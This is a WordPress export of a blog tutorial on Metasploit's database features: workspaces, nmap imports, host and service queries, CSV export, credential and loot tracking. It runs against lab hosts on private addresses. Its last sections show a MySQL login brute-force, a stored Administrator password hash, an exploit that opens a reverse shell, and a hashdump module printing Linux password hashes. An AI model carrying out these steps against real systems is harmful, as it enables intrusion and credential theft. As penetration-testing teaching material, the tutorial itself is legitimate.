{"id":475,"date":"2018-06-05T15:46:26","date_gmt":"2018-06-05T15:46:26","guid":{"rendered":"http:\/\/www.asianux.org.vn\/?p=475"},"modified":"2018-06-06T10:12:19","modified_gmt":"2018-06-06T10:12:19","slug":"using-the-database-in-metasploit","status":"publish","type":"post","link":"https:\/\/www.asianux.org.vn\/index.php\/2018\/06\/05\/using-the-database-in-metasploit\/","title":{"rendered":"Using the Database in Metasploit"},"content":{"rendered":"

Setup our Metasploit Database<\/span><\/h2>\n

In Kali, you will need to start up the\u00a0postgresql<\/b>\u00a0server before using the database.<\/p>\n

root@kali:~# systemctl start postgresql\r\n<\/pre>\n
After starting\u00a0postgresql<\/b>\u00a0you need to create and initialize the\u00a0msf<\/b>\u00a0database with\u00a0msfdb init<\/b><\/p>\n
root@kali:~# msfdb init\r\nCreating database user 'msf'\r\nEnter password for new role: \r\nEnter it again: \r\nCreating databases 'msf' and 'msf_test'\r\nCreating configuration file in \/usr\/share\/metasploit-framework\/config\/database.yml\r\nCreating initial database schema\r\n<\/pre>\n
 <\/p>\n
Using Workspaces in Metasploit<\/span><\/h2>\n
When we load up msfconsole, and run \u2018db_status<\/strong>\u2018, we can confirm that Metasploit is successfully connected to the database.<\/p>\n
msf > db_status \r\n[*] postgresql connected to msf\r\n<\/pre>\n
Seeing this capability is a meant to keep\u00a0track of our activities and scans in order. It\u2019s imperative we start off on the right foot. Once connected to the database, we can start organizing our different movements by using what are called \u2018workspaces\u2019. This gives us the ability to save different scans from different locations\/networks\/subnets for example.<\/p>\n
Issuing the \u2018workspace<\/strong>\u2018 command from the\u00a0msfconsole<\/strong>, will display the currently selected workspaces. The \u2018default<\/strong>\u2018 workspace is selected when connecting to the database, which is represented by the * beside its name.<\/p>\n
msf > workspace\r\n* default\r\n  msfu\r\n  lab1\r\n  lab2\r\n  lab3\r\n  lab4\r\nmsf > \r\n<\/pre>\n
As we can see this can be quite handy when it comes to keeping things \u2018neat\u2019. Let\u2019s change the current workspace to \u2018msfu\u2019.<\/p>\n
msf > workspace msfu\r\n[*] Workspace: msfu\r\nmsf > workspace\r\n  default\r\n* msfu\r\n  lab1\r\n  lab2\r\n  lab3\r\n  lab4\r\nmsf > \r\n<\/pre>\n
Creating and deleting a workspace one simply uses the \u2018-a<\/strong>\u2018 or \u2018-d<\/strong>\u2018 followed by the name at the msfconsole prompt.<\/p>\n
msf > workspace -a lab4\r\n[*] Added workspace: lab4\r\nmsf > \r\n\r\n\r\nmsf > workspace -d lab4 \r\n[*] Deleted workspace: lab4\r\nmsf > workspace\r\n<\/pre>\n
It\u2019s that simple, using the same command and adding the \u2018-h<\/strong>\u2018 switch will provide us with the command\u2019s other capabilities.<\/p>\n
 \r\nmsf > workspace -h\r\nUsage:\r\n    workspace                  List workspaces\r\n    workspace -v               List workspaces verbosely\r\n    workspace [name]           Switch workspace\r\n    workspace -a [name] ...    Add workspace(s)\r\n    workspace -d [name] ...    Delete workspace(s)\r\n    workspace -D               Delete all workspaces\r\n    workspace -r     Rename workspace\r\n    workspace -h               Show this help information\r\n\r\nmsf > \r\n<\/pre>\n
From now on any scan or imports from 3rd party applications will be saved into this workspace.<\/p>\n
Now that we are connected to our database and workspace setup, lets look at populating it with some data. First we\u2019ll look at the different \u2018db_\u2019 commands available to use using the \u2018help\u2019 command from the msfconsole.<\/p>\n
msf > help\r\n...snip...\r\n\r\nDatabase Backend Commands\r\n=========================\r\n\r\n    Command           Description\r\n    -------           -----------\r\n    creds             List all credentials in the database\r\n    db_connect        Connect to an existing database\r\n    db_disconnect     Disconnect from the current database instance\r\n    db_export         Export a file containing the contents of the database\r\n    db_import         Import a scan result file (filetype will be auto-detected)\r\n    db_nmap           Executes nmap and records the output automatically\r\n    db_rebuild_cache  Rebuilds the database-stored module cache\r\n    db_status         Show the current database status\r\n    hosts             List all hosts in the database\r\n    loot              List all loot in the database\r\n    notes             List all notes in the database\r\n    services          List all services in the database\r\n    vulns             List all vulnerabilities in the database\r\n    workspace         Switch between database workspaces\r\n\r\n<\/pre>\n
Importing and Scanning<\/span><\/h2>\n
There are several ways we can do this, from scanning a host or network directly from the console, or importing a file from an earlier scan. Let\u2019s start by importing an nmap scan of the \u2018metasploitable 2\u2019 host. This is done using the \u2018db_import<\/strong>\u2018 followed by the path to our file.<\/p>\n
msf >  db_import \/root\/msfu\/nmapScan \r\n[*] Importing 'Nmap XML' data\r\n[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'\r\n[*] Importing host 172.16.194.172\r\n[*] Successfully imported \/root\/msfu\/nmapScan\r\nmsf > hosts\r\n\r\nHosts\r\n=====\r\n\r\naddress         mac                name  os_name  os_flavor  os_sp  purpose  info  comments\r\n-------         ---                ----  -------  ---------  -----  -------  ----  --------\r\n172.16.194.172  00:0C:29:D1:62:80        Linux    Ubuntu            server         \r\n\r\nmsf > \r\n<\/pre>\n
Once completed we can confirm the import by issuing the \u2018hosts\u2019 command. This will display all the hosts stored in our current workspace. We can also scan a host directly from the console using the \u2018db_nmap\u2019 command. Scan results will be saved in our current database. The command works the same way as the command line version of \u2018nmap\u2019<\/p>\n
msf > db_nmap -A 172.16.194.134\r\n[*] Nmap: Starting Nmap 5.51SVN ( http:\/\/nmap.org ) at 2012-06-18 12:36 EDT\r\n[*] Nmap: Nmap scan report for 172.16.194.134\r\n[*] Nmap: Host is up (0.00031s latency).\r\n[*] Nmap: Not shown: 994 closed ports\r\n[*] Nmap: PORT     STATE SERVICE      VERSION\r\n[*] Nmap: 80\/tcp   open  http         Apache httpd 2.2.17 ((Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 \r\n\r\n...snip...\r\n\r\n[*] Nmap: HOP RTT     ADDRESS\r\n[*] Nmap: 1   0.31 ms 172.16.194.134\r\n[*] Nmap: OS and Service detection performed. Please report any incorrect results at http:\/\/nmap.org\/submit\/ .\r\n[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.91 seconds\r\nmsf >\r\n\r\n\r\nmsf > hosts\r\n\r\nHosts\r\n=====\r\n\r\naddress         mac                name  os_name            os_flavor  os_sp  purpose  info  comments\r\n-------         ---                ----  -------            ---------  -----  -------  ----  --------\r\n172.16.194.134  00:0C:29:68:51:BB        Microsoft Windows  XP                server         \r\n172.16.194.172  00:0C:29:D1:62:80        Linux              Ubuntu            server         \r\n\r\nmsf > \r\n<\/pre>\n
Backing Up Our Data<\/span><\/h2>\n
Exporting our data outside the Metasploit environment is very simple. Using the \u2018db_export<\/strong>\u2018 command all our gathered information can be saved in a XML file. This format can be easily used and manipulated later for reporting purposes. The command has 2 outputs, the \u2018xml<\/strong>\u2018 format which will export all of the information currently stored in our active workspace, and the \u2018pwdump<\/strong>\u2018 format which exports everything related to used\/gathered credentials.<\/p>\n
msf >  db_export -h\r\nUsage:\r\n    db_export -f  [-a] [filename]\r\n    Format can be one of: xml, pwdump\r\n[-] No output file was specified\r\n\r\nmsf > db_export -f xml \/root\/msfu\/Exported.xml\r\n[*] Starting export of workspace msfu to \/root\/msfu\/Exported.xml [ xml ]...\r\n[*]     >> Starting export of report\r\n[*]     >> Starting export of hosts\r\n[*]     >> Starting export of events\r\n[*]     >> Starting export of services\r\n[*]     >> Starting export of credentials\r\n[*]     >> Starting export of web sites\r\n[*]     >> Starting export of web pages\r\n[*]     >> Starting export of web forms\r\n[*]     >> Starting export of web vulns\r\n[*]     >> Finished export of report\r\n[*] Finished export of workspace msfu to \/root\/msfu\/Exported.xml [ xml ]...\r\n\r\n\r\n<\/pre>\n
Using the Hosts Command<\/span><\/h2>\n
Now that we can import and export information to and from our database, let us look at how we can use this information within the msfconsole. Many commands are available to search for specific information stored in our database. Hosts names, address, discovered services etc. We can even use the resulting data to populate module settings such as RHOSTS. We\u2019ll look how this is done a bit later.<\/p>\n
The \u2018hosts<\/strong>\u2018 command was used earlier to confirm the presence of data in our database. Let\u2019s look at the different options available and see how we use it to provide us with quick and useful information. Issuing the command with \u2018-h\u2019 will display the help menu.<\/p>\n
msf > hosts -h\r\nUsage: hosts [ options ] [addr1 addr2 ...]\r\n\r\nOPTIONS:\r\n  -a,--add          Add the hosts instead of searching\r\n  -d,--delete       Delete the hosts instead of searching\r\n  -c <col1,col2>    Only show the given columns (see list below)\r\n  -h,--help         Show this help information\r\n  -u,--up           Only show hosts which are up\r\n  -o          Send output to a file in csv format\r\n  -O        Order rows by specified column number\r\n  -R,--rhosts       Set RHOSTS from the results of the search\r\n  -S,--search       Search string to filter by\r\n  -i,--info         Change the info of a host\r\n  -n,--name         Change the name of a host\r\n  -m,--comment      Change the comment of a host\r\n  -t,--tag          Add or specify a tag to a range of hosts\r\n\r\nAvailable columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags\r\n\r\n<\/pre>\n
We\u2019ll start by asking the \u2018hosts<\/strong>\u2018 command to display only the IP address and OS type using the \u2018-c<\/strong>\u2018 switch.<\/p>\n
msf > hosts -c address,os_flavor\r\n\r\nHosts\r\n=====\r\n\r\naddress         os_flavor\r\n-------         ---------\r\n172.16.194.134  XP\r\n172.16.194.172  Ubuntu\r\n\r\n<\/pre>\n
Setting up Modules<\/span><\/h2>\n
Another interesting feature available to us, is the ability to search all our entries for something specific. Imagine if we wished to find only the Linux based machines from our scan. For this we\u2019d use the \u2018-S<\/strong>\u2018 option. This option can be combined with our previous example and help fine tune our results.<\/p>\n
msf > hosts -c address,os_flavor -S Linux\r\n\r\nHosts\r\n=====\r\n\r\naddress         os_flavor\r\n-------         ---------\r\n172.16.194.172  Ubuntu\r\n\r\nmsf >\r\n\r\n<\/pre>\n
Using the output of our previous example, we\u2019ll feed that into the \u2018tcp\u2019 scan auxiliary module.<\/p>\n
msf  auxiliary(tcp) > show options\r\n\r\nModule options (auxiliary\/scanner\/portscan\/tcp):\r\n\r\n   Name         Current Setting  Required  Description\r\n   ----         ---------------  --------  -----------\r\n   CONCURRENCY  10               yes       The number of concurrent ports to check per host\r\n   FILTER                        no        The filter string for capturing traffic\r\n   INTERFACE                     no        The name of the interface\r\n   PCAPFILE                      no        The name of the PCAP capture file to process\r\n   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)\r\n   RHOSTS                        yes       The target address range or CIDR identifier\r\n   SNAPLEN      65535            yes       The number of bytes to capture\r\n   THREADS      1                yes       The number of concurrent threads\r\n   TIMEOUT      1000             yes       The socket connect timeout in milliseconds\r\n\r\n<\/pre>\n
We can see by default, nothing is set in \u2018RHOSTS<\/strong>\u2018, we\u2019ll add the \u2018-R<\/strong>\u2018 switch to the hosts command and run the module. Hopefully it will run and scan our target without any problems.<\/p>\n
msf  auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R\r\n\r\nHosts\r\n=====\r\n\r\naddress         os_flavor\r\n-------         ---------\r\n172.16.194.172  Ubuntu\r\n\r\nRHOSTS => 172.16.194.172\r\n\r\nmsf  auxiliary(tcp) > run\r\n\r\n[*] 172.16.194.172:25 - TCP OPEN\r\n[*] 172.16.194.172:23 - TCP OPEN\r\n[*] 172.16.194.172:22 - TCP OPEN\r\n[*] 172.16.194.172:21 - TCP OPEN\r\n[*] 172.16.194.172:53 - TCP OPEN\r\n[*] 172.16.194.172:80 - TCP OPEN\r\n\r\n...snip...\r\n\r\n[*] 172.16.194.172:5432 - TCP OPEN\r\n[*] 172.16.194.172:5900 - TCP OPEN\r\n[*] 172.16.194.172:6000 - TCP OPEN\r\n[*] 172.16.194.172:6667 - TCP OPEN\r\n[*] 172.16.194.172:6697 - TCP OPEN\r\n[*] 172.16.194.172:8009 - TCP OPEN\r\n[*] 172.16.194.172:8180 - TCP OPEN\r\n[*] 172.16.194.172:8787 - TCP OPEN\r\n[*] Scanned 1 of 1 hosts (100% complete)\r\n[*] Auxiliary module execution completed\r\n\r\n<\/pre>\n
Of course this also works if our results contain more than one address.<\/p>\n
msf  auxiliary(tcp) > hosts -R\r\n\r\nHosts\r\n=====\r\n\r\naddress         mac                name  os_name            os_flavor  os_sp  purpose  info  comments\r\n-------         ---                ----  -------            ---------  -----  -------  ----  --------\r\n172.16.194.134  00:0C:29:68:51:BB        Microsoft Windows  XP                server         \r\n172.16.194.172  00:0C:29:D1:62:80        Linux              Ubuntu            server         \r\n\r\nRHOSTS => 172.16.194.134 172.16.194.172\r\n\r\nmsf  auxiliary(tcp) > show options\r\n\r\nModule options (auxiliary\/scanner\/portscan\/tcp):\r\n\r\n   Name         Current Setting                Required  Description\r\n   ----         ---------------                --------  -----------\r\n   CONCURRENCY  10                             yes       The number of concurrent ports to check per host\r\n   FILTER                                      no        The filter string for capturing traffic\r\n   INTERFACE                                   no        The name of the interface\r\n   PCAPFILE                                    no        The name of the PCAP capture file to process\r\n   PORTS        1-10000                        yes       Ports to scan (e.g. 22-25,80,110-900)\r\n   RHOSTS       172.16.194.134 172.16.194.172  yes       The target address range or CIDR identifier\r\n   SNAPLEN      65535                          yes       The number of bytes to capture\r\n   THREADS      1                              yes       The number of concurrent threads\r\n   TIMEOUT      1000                           yes       The socket connect timeout in milliseconds\r\n\r\n<\/pre>\n
You can see how useful this may be if our database contained hundreds of entries. We could search for Windows machines only, then set the RHOSTS option for the smb_version auxiliary module very quickly. The set RHOSTS switch is available in almost all of the commands that interact with the database.<\/p>\n
Services<\/span><\/h2>\n
Another\u00a0way to search the database is by using the \u2018services<\/strong>\u2018 command. Like the previous examples, we can extract very specific information with little effort.<\/p>\n
 \r\nmsf > services -h\r\n\r\nUsage: services [-h] [-u] [-a] [-r ] [-p >port1,port2>] [-s >name1,name2>] [-o ] [addr1 addr2 ...]\r\n\r\n  -a,--add          Add the services instead of searching\r\n  -d,--delete       Delete the services instead of searching\r\n  -c <col1,col2>    Only show the given columns\r\n  -h,--help         Show this help information\r\n  -s <name1,name2>  Search for a list of service names\r\n  -p <port1,port2>  Search for a list of ports\r\n  -r      Only show [tcp|udp] services\r\n  -u,--up           Only show services which are up\r\n  -o          Send output to a file in csv format\r\n  -R,--rhosts       Set RHOSTS from the results of the search\r\n  -S,--search       Search string to filter by\r\n\r\nAvailable columns: created_at, info, name, port, proto, state, updated_at\r\n\r\n<\/pre>\n
Much in the same way as the hosts command, we can specify which fields to be displayed. Coupled with the \u2018-S<\/strong>\u2018 switch, we can also search for a service containing a particular string.<\/p>\n
msf > services -c name,info 172.16.194.134\r\n\r\nServices\r\n========\r\n\r\nhost            name          info\r\n----            ----          ----\r\n172.16.194.134  http          Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.134  msrpc         Microsoft Windows RPC \r\n172.16.194.134  netbios-ssn   \r\n172.16.194.134  http          Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.134  microsoft-ds  Microsoft Windows XP microsoft-ds \r\n172.16.194.134  mysql \r\n\r\n<\/pre>\n
Here we are searching all hosts contained in our database with a service name containing the string \u2018http\u2019.<\/p>\n
msf > services -c name,info -S http\r\n\r\nServices\r\n========\r\n\r\nhost            name  info\r\n----            ----  ----\r\n172.16.194.134  http  Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.134  http  Apache httpd 2.2.17 (Win32) mod_ssl\/2.2.17 OpenSSL\/0.9.8o PHP\/5.3.4 mod_perl\/2.0.4 Perl\/v5.10.1 \r\n172.16.194.172  http  Apache httpd 2.2.8 (Ubuntu) DAV\/2 \r\n172.16.194.172  http  Apache Tomcat\/Coyote JSP engine 1.1 \r\n\r\n<\/pre>\n
The combinations for searching are enormous. We can use specific ports, or port ranges. Full or partial service name when using the \u2018-s\u2019 or \u2018-S\u2019 switches. For all hosts or just a select few\u2026 The list goes on and on. Here are a few examples, but you may need to experiment with these features in order to get what you want and need out your searches.<\/p>\n
msf > services -c info,name -p 445\r\n\r\nServices\r\n========\r\n\r\nhost            info                                  name\r\n----            ----                                  ----\r\n172.16.194.134  Microsoft Windows XP microsoft-ds     microsoft-ds\r\n172.16.194.172  Samba smbd 3.X workgroup: WORKGROUP   netbios-ssn\r\n\r\n<\/pre>\n
\n
msf > services -c port,proto,state -p 70-81\r\nServices\r\n========\r\nhost           port proto state\r\n----           ---- ----- -----\r\n172.16.194.134 80   tcp   open\r\n172.16.194.172 75   tcp   closed\r\n172.16.194.172 71   tcp   closed\r\n172.16.194.172 72   tcp   closed\r\n172.16.194.172 73   tcp   closed\r\n172.16.194.172 74   tcp   closed\r\n172.16.194.172 70   tcp   closed\r\n172.16.194.172 76   tcp   closed\r\n172.16.194.172 77   tcp   closed\r\n172.16.194.172 78   tcp   closed\r\n172.16.194.172 79   tcp   closed\r\n172.16.194.172 80   tcp   open\r\n172.16.194.172 81   tcp  closed\r\n<\/pre>\n
\n
msf > services -s http -c port 172.16.194.134\r\nServices\r\n========\r\nhost           port\r\n----           ----\r\n172.16.194.134 80\r\n172.16.194.134 443\r\n<\/pre>\n
\n
msf > services -S Unr\r\nServices\r\n========\r\nhost           port proto name state info\r\n----           ---- ----- ---- ----- ----\r\n172.16.194.172 6667 tcp   irc  open  Unreal ircd\r\n172.16.194.172 6697 tcp   irc  open  Unreal ircd\r\n<\/pre>\n
CSV Export<\/span><\/h2>\n
Both the hosts and services commands give us a means of saving our query results into a file. The file format is a comma separated value, or CSV. Followed by the \u2018-o\u2019 with path and filename, the information that has been displayed on the screen at this point will now be saved to disk.<\/p>\n
msf > services -s http -c port 172.16.194.134 -o \/root\/msfu\/http.csv\r\n\r\n[*] Wrote services to \/root\/msfu\/http.csv\r\n\r\nmsf > hosts -S Linux -o \/root\/msfu\/linux.csv\r\n[*] Wrote hosts to \/root\/msfu\/linux.csv\r\n\r\nmsf > cat \/root\/msfu\/linux.csv\r\n[*] exec: cat \/root\/msfu\/linux.csv\r\n\r\naddress,mac,name,os_name,os_flavor,os_sp,purpose,info,comments\r\n\"172.16.194.172\",\"00:0C:29:D1:62:80\",\"\",\"Linux\",\"Debian\",\"\",\"server\",\"\",\"\"\r\n\r\nmsf > cat \/root\/msfu\/http.csv\r\n[*] exec: cat \/root\/msfu\/http.csv\r\n\r\nhost,port\r\n\"172.16.194.134\",\"80\"\r\n\"172.16.194.134\",\"443\"\r\n\r\n<\/pre>\n
Creds<\/span><\/h2>\n
The \u2018creds\u2019 command is used to manage found and used credentials for targets in our database. Running this command without any options will display currently saved credentials.<\/p>\n
msf > creds\r\n\r\nCredentials\r\n===========\r\n\r\nhost  port  user  pass  type  active?\r\n----  ----  ----  ----  ----  -------\r\n\r\n[*] Found 0 credentials.\r\n\r\n<\/pre>\n
As with \u2018db_nmap<\/strong>\u2018 command, successful results relating to credentials will be automatically saved to our active workspace. Let\u2019s run the auxiliary module \u2018mysql_login<\/strong>\u2018 and see what happens when Metasploit scans our server.<\/p>\n
msf  auxiliary(mysql_login) > run\r\n\r\n[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a\r\n[*] 172.16.194.172:3306 MYSQL - [1\/2] - Trying username:'root' with password:''\r\n[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''\r\n[*] Scanned 1 of 1 hosts (100% complete)\r\n[*] Auxiliary module execution completed\r\n\r\n\r\nmsf  auxiliary(mysql_login) > creds \r\n\r\nCredentials\r\n===========\r\n\r\nhost            port  user  pass  type      active?\r\n----            ----  ----  ----  ----      -------\r\n172.16.194.172  3306  root        password  true\r\n\r\n[*] Found 1 credential.\r\nmsf  auxiliary(mysql_login) >\r\n<\/pre>\n
We can see the module was able to connect to our mysql server, and because of this Metasploit saved the credentials in our database automatically for future reference.<\/p>\n
During post-exploitation of a host, gathering user credentials is an important activity in order to further penetrate a target network. As we gather sets of credentials, we can add them to our database with the \u2018creds -a\u2019 command.<\/p>\n
msf > creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::\r\n[*] Time: 2012-06-20 20:31:42 UTC Credential: host=172.16.194.134 port=445 proto=tcp sname= type=password user=Administrator pass=7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true\r\n\r\nmsf > creds\r\n\r\nCredentials\r\n===========\r\n\r\nhost            port  user           pass                                                                  type      active?\r\n----            ----  ----           ----                                                                  ----      -------\r\n172.16.194.134  445   Administrator  7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::  password  true\r\n\r\n[*] Found 1 credential.\r\n\r\n\r\n<\/pre>\n
Loot<\/span><\/h2>\n
Once you\u2019ve compromised a system (or three), one of the objective may be to retrieve hash dumps. From either a Windows or *nix system. In the event of a successful hash dump, this information will be stored in our database. We can view this dumps using the \u2018loot\u2019 command. As with almost every command, adding the \u2018-h\u2019 switch will display a little more information.<\/p>\n
msf > loot -h\r\nUsage: loot\r\n Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]\r\n  Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]\r\n  Del: loot -d [addr1 addr2 ...]\r\n\r\n  -a,--add          Add loot to the list of addresses, instead of listing\r\n  -d,--delete       Delete *all* loot matching host and type\r\n  -f,--file         File with contents of the loot to add\r\n  -i,--info         Info of the loot to add\r\n  -t <type1,type2>  Search for a list of types\r\n  -h,--help         Show this help information\r\n  -S,--search       Search string to filter by\r\n<\/pre>\n
Here\u2019s an example of how one would populate the database with some \u2018loot\u2019.<\/p>\n
msf  exploit(usermap_script) > exploit\r\n\r\n[*] Started reverse double handler\r\n[*] Accepted the first client connection...\r\n[*] Accepted the second client connection...\r\n[*] Command: echo 4uGPYOrars5OojdL;\r\n[*] Writing to socket A\r\n[*] Writing to socket B\r\n[*] Reading from sockets...\r\n[*] Reading from socket B\r\n[*] B: \"4uGPYOrars5OojdL\\r\\n\"\r\n[*] Matching...\r\n[*] A is input...\r\n[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:55138) at 2012-06-27 19:38:54 -0400\r\n\r\n^Z\r\nBackground session 1? [y\/N]  y\r\n\r\nmsf  exploit(usermap_script) > use post\/linux\/gather\/hashdump\r\nmsf  post(hashdump) > show options\r\n\r\nModule options (post\/linux\/gather\/hashdump):\r\n\r\n   Name     Current Setting  Required  Description\r\n   ----     ---------------  --------  -----------\r\n   SESSION  1                yes       The session to run this module on.\r\n\r\nmsf  post(hashdump) > sessions -l\r\n\r\nActive sessions\r\n===============\r\n\r\n  Id  Type        Information  Connection\r\n  --  ----        -----------  ----------\r\n  1   shell unix               172.16.194.163:4444 -> 172.16.194.172:55138 (172.16.194.172)\r\n\r\nmsf  post(hashdump) > run\r\n\r\n[+] root:$1$\/avpfBJ1$x0z8w5UF9Iv.\/DR9E9Lid.:0:0:root:\/root:\/bin\/bash\r\n[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:\/dev:\/bin\/sh\r\n[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::\/home\/klog:\/bin\/false\r\n[+] msfadmin:$1$XN10Zj2c$Rt\/zzCW3mLtUWA.ihZjA5\/:1000:1000:msfadmin,,,:\/home\/msfadmin:\/bin\/bash\r\n[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe\/:108:117:PostgreSQL administrator,,,:\/var\/lib\/postgresql:\/bin\/bash\r\n[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:\/home\/user:\/bin\/bash\r\n[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu\/\/:1002:1002:,,,:\/home\/service:\/bin\/bash\r\n[+] Unshadowed Password File: \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt\r\n[*] Post module execution completed\r\n\r\n\r\n\r\nmsf  post(hashdump) > loot\r\n\r\nLoot\r\n====\r\n\r\nhost            service  type          name                   content     info                            path\r\n----            -------  ----          ----                   -------     ----                            ----\r\n172.16.194.172           linux.hashes  unshadowed_passwd.pwd  text\/plain  Linux Unshadowed Password File  \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt\r\n172.16.194.172           linux.passwd  passwd.tx              text\/plain  Linux Passwd File               \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt\r\n172.16.194.172           linux.shadow  shadow.tx              text\/plain  Linux Password Shadow File      \/root\/.msf4\/loot\/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
Setup our Metasploit Database In Kali, you will need to start up the\u00a0postgresql\u00a0server before using the database. root@kali:~# systemctl start postgresql After starting\u00a0postgresql\u00a0you need to create and initialize the\u00a0msf\u00a0database with\u00a0msfdb init root@kali:~# msfdb init Creating…<\/p>\n","protected":false},"author":1,"featured_media":487,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-475","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pentest"],"_links":{"self":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/475","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/comments?post=475"}],"version-history":[{"count":1,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/475\/revisions"}],"predecessor-version":[{"id":476,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/475\/revisions\/476"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media\/487"}],"wp:attachment":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media?parent=475"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/categories?post=475"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/tags?post=475"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}